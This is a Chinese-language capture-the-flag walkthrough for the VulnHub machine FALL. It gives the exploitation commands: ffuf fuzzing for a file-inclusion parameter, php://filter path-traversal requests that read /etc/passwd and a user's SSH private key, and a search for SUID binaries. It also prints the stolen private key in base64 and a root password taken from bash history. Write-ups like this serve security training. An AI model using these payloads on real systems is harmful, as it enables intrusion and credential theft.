vulnhub靶場之DIGITALWORLD.LOCAL: FALL
準備:
攻擊機:虛擬機器kali、本機win10。
靶機:digitalworld.local: FALL,下載地址:https://download.vulnhub.com/digitalworld/FALL.7z,下載後直接vbox開啟即可。
知識點:ffuf引數爆破、檔案包含、ssh私匙登入、歷史命令洩露敏感資訊。
資訊收集:
掃描下埠對應的服務:nmap -T4 -sV -A 192.168.110.110,顯示開放了22、80、139、9090埠,開啟了ssh、http、samba服務。
訪問下web服務,發現一個疑是賬戶名:qiu,以及提示資訊告訴我們存在測試指令碼汙染,那就進行下目錄掃描。
目錄掃描:
使用dirmap進行目錄掃描,發現了test.php、robots.txt等檔案。訪問robots.txt檔案未發現有用資訊。訪問test.php檔案顯示缺少引數。
ffuf引數爆破:
使用ffuf進行引數爆破,命令:ffuf -u 'http://192.168.110.110/test.php?FUZZ=../../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 80,成功獲得引數名稱:file。最後的-fs是為了過濾下無用的返回資訊,需要根據具體情況進行調整,這裡使用-fs 80就可以。
訪問下該檔案:../../../../../../../etc/passwd,命令:http://192.168.110.110/test.php?file=../../../../../../../etc/passwd,證實賬戶:qiu的存在。
獲取shell:
利用此檔案包含漏洞讀取下其私匙資訊,命令:http://192.168.110.110/test.php?file=php://filter/read=convert.base64-encode/resource=/home/qiu/.ssh/id_rsa,這裡我使用的是base64加密,未使用的時候讀取時格式不太對,因此使用base64讀取在進行解碼。
id_rsa_base64
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJGd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFRRUF2TmpoT0ZPU2VESHk5SzV2bkhTczNxVGpXTmVoQVB6VDBzRDNiZUJQVnZZS1FKdDBBa0QwCkZEY1dUU1NGMTNOaGJqQ1FtNWZuelI4dGQ0c2pKTVlpQWwrdkFLYm9IbmUwbmpHa0J3ZHk1UGdtY1h5ZVpURUNJR2tnZ1gKNjFrSW1VT0lxdExNY2pGNXRpKzA5UkdpV2VTbWZJRHRUQ2pqLyt1UWxva1VNdGRjNE5PdjRYR0picDdHZEVXQlpldmllbgpxWG9YdEc2ajdnVWd0WFgxRnhseDNGUGh4RTNseHcvQWZaOWliMjFKR2xPeXk4Y2ZsVGxvZ3JaUG9JQ0NYSVYva3hHSzBkClp1Y3c4ckdHTWM2SnY3bnBlUVMxSVhVOVZuUDNMV2xPR0ZVMGorSVM1U2lOa3NSZmRRNG1DTjlTWWhBbTltQUtjWlc4d1MKdlh1RGpXT0xFd0FBQTlBUzV0Um1FdWJVWmdBQUFBZHpjMmd0Y25OaEFBQUJBUUM4Mk9FNFU1SjRNZkwwcm0rY2RLemVwTwpOWTE2RUEvTlBTd1BkdDRFOVc5Z3BBbTNRQ1FQUVVOeFpOSklYWGMyRnVNSkNibCtmTkh5MTNpeU1reGlJQ1g2OEFwdWdlCmQ3U2VNYVFIQjNMaytDWnhmSjVsTVFJZ2FTQ0JmcldRaVpRNGlxMHN4eU1YbTJMN1QxRWFKWjVLWjhnTzFNS09QLzY1Q1cKaVJReTExemcwNi9oY1lsdW5zWjBSWUZsNitKNmVwZWhlMGJxUHVCU0MxZGZVWEdYSGNVK0hFVGVYSEQ4QjluMkp2YlVrYQpVN0xMeHgrVk9XaUN0aytnZ0lKY2hYK1RFWXJSMW01ekR5c1lZeHpvbS91ZWw1QkxVaGRUMVdjL2N0YVU0WVZUU1A0aExsCktJMlN4RjkxRGlZSTMxSmlFQ2IyWUFweGxiekJLOWU0T05ZNHNUQUFBQUF3RUFBUUFBQVFBclhJRWFOZFpEMHZRK1NtOUcKTldRY0d6QTRqZ3BoOTZ1TGtOTS9YMm5ZUmRaRXoyenJ0NDVUdGZKZzlDbm5ObzhBaGhZdUk4c054a0xpV0FoUndVeTl6cwpxWUU3cm9oQVBzN3VrQzFDc0ZlQlVicWNtVTRwUGliVUVSZXM2bHlYRkhLbEJwSDdCbkV6Ni9CWTlSdWFHRzVCMkRpa2JCCjh0L0NETzc5cTdjY2ZUWnMrZ09WUlg0UFc2NDErY1p4bzUvZ0wzR2NkSndEWTRnZ1B3YlUvbThzWXN5TjFOV0o4TkgwMGQKWDhUSGFRQUVYQU82VFR6UE1MZ3dKaSswa2oxVVRnK0Qrbk9OZmg3eGVYTHNlU1QwbTFwK2U5Qy84cnNlWnNTSlN4b1hLawpDbUR5NjlhTW9kY3BXK1pYbDlOY2pFd3JNdkpQTExLamhJVWNJaE5qZjRBQkFBQUFnRXIzWktVdUpxdUJORlBoRVVnVWljCml2SG9aSDZVODJWeUVZMkJ6MjRxZXZjVnoySWNBWExCTElwK2Yxb2l3WVVWTUl1V1FEdzZMU29uOFM3MmtrN1ZXaURyV3oKbEhqUmZwVXdXZHpkV1NNWTZQSTdFcEdWVnMwcW1SQy9UVHFPSUgrRlhBNjZjRngzWDR1T0Nqa3pUMC9FczB1TnlaMDdxUQo1OGNHRThjS3JMQUFBQWdRRGxQYWpEUlZmRFdnT1dKaitpbVhmcEdzbW84MVVEYVlYd2tsenc0Vk0yU2ZJSElBRlpQYUEwCmFjbTQvaWNLR1BsbllXc3ZaQ2tzdmxVY2srdGkrSjJSUzJNcTlqbUtCMEFWWmlzRmF6ajhxSWRlM1NQUHd0UjdnQlIzMjkKSlczRGIrS0lTTVJJdmRwSnYrZWlLUUxnL2VwYlNkd1haaTBESm9CMGExNUZzSUFRQUFBSUVBMHVRbDBkMHAzTnhDeVQvKwpRNk4rbGxmOVRCNStWTmppbmFHdTREWTZxVnJTSG1oa2NlSHRYeEc2aDl1cFJ0S3c1QnZPbFNiVGF0bGZNWllVdGxaMW1MClJXQ1U4RDd2MVFuN3FNZmx4NGJsZFlnVjhsZjE4c2I2Zy91enRXSnVMcEZlM1VlL01MZ2VKKzJUaUF3OXlZb1BWeVNOSzgKdWhTSGEwZHZ2ZW9KOHhNQUFBQVpjV2wxUUd4dlkyRnNhRzl6ZEM1c2IyTmhiR1J2YldGcGJnRUMKLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
在kali上將base64解碼後的資料寫入到id_rsa檔案並賦予600許可權。然後使用id_rsa進行登入,命令:ssh [email protected] -i id_rsa,成功獲得shell許可權。
在當前目錄下發現local.txt檔案,讀取該檔案獲取到flag值。
提權:
檢視下當前賬戶是否存在可以使用的特權命令,sudo -l,但是需要密碼才可以。
檢視當前使用者下具有root許可權的可執行檔案都有哪些,命令:find / -perm -4000 -type f 2>/dev/null,發現了/usr/lib/polkit-1/polkit-agent-helper-1,但是相關的兩個漏洞經測試均失敗。
後來在當前目錄下發現.bash_history檔案,讀取該檔案時發現一串字元:remarkablyawesomE,疑是密碼。
使用獲得的字串進行嘗試切換root賬戶,成功切換到root賬戶並在/rrot目錄下發現proof.txt檔案,讀取該檔案,成功獲取到flag值。